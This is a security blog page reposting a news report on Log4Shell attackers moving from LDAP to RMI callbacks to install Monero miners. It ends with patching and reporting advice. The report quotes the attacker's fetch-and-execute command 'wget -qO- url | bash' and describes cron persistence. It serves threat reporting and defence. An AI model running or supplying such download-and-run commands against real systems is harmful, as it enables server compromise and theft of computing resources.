fbpx
Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Penetration Testing

          Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

Log4j Attackers Switch to Injecting Monero Miners via RMI

Log4j Attackers Switch to Injecting Monero Miners via RMI

Some threat actors exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI or even used both in a single request for maximum chances of success.

This shift is a notable development in the ongoing attack and one that defenders need to be aware of when trying to secure all potential vectors.

For now, this trend was observed by threat actors looking to hijack resources for Monero mining, but others could adopt it at any time.

Also Read: How To Anonymised The Data: What Are The Importance Of This?

From LDAP to RMI

Most attacks targeting the Log4j “Log4Shell” vulnerability have been through the LDAP (Lightweight Directory Access Protocol) service.

The switch to RMI (Remote Method Invocation) API seems counter-intuitive at first, considering that this mechanism is subject to additional checks and constraints, but that’s not always the case.

Some JVM (Java Virtual Machine) versions do not feature stringent policies, and as such, RMI can sometimes be a more effortless channel to achieving RCE (remote code execution) than LDAP.

Moreover, LDAP requests are now solidified as part of the infection chain and are more tightly monitored by defenders.

For example, many IDS/IPS tools are currently filtering requests with JNDI and LDAP, so there’s a chance that RMI may be ignored at this point.

Post request sent to vulnerable targets
Post request sent to vulnerable targets
Source: Juniper Labs

In some cases, Juniper saw both RMI and LDAP services in the same HTTP POST request.

However, for all actors attempting to abuse the Log4Shell vulnerability, the goal remains the same – sending an exploit string to be processed by the vulnerable Log4j server, leading to code execution on the target.

Also Read: Trusted Data Sharing Framework IMDA Announced In Singapore

The above attack causes a bash shell to be spawned that downloads a shell script from a remote server.

“This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script,” explains the Juniper Labs report

“During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine.”

Hijacking resources to make money

In the attacks seen by Juniper Labs, threat actors are interested in mining Monero on the compromised servers and present it as an almost innocuous activity that “ain’t going to harm anyone else.”

Message found in the downloaded shell script
Actor message found in the downloaded shell script
Source: Juniper Labs

The miner targets x84_64 Linux systems and adds persistence via the cron subsystem.

Although most attacks so far have targeted Linux systems, CheckPoint reports that its analysts discovered the first Win32 executable that leverages Log4Shell, called ‘StealthLoader.’

Locate, update, report

The only feasible way to defend against what has become one of the most impactful vulnerabilities in recent history is to upgrade Log4j to version 2.16.0.

Additionally, admins should keep a close eye on Apache’s security section for new version announcements and apply them immediately.

For mitigation guidance and complete technical information resources, check out CISA’s detailed page on Log4Shell.

There’s an extensive list of products affected by CVE-2021-44228, and a list with vendor-supplied advisories is constantly updated on this GitHub repository

Finally, if you notice suspicious activity on your systems, consider reporting it to the FBI or CISA, who are working feverishly to contain the damage and remediate the situation.

0 Comments

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
×

Hello!

Click one of our contacts below to chat on WhatsApp

× Chat with us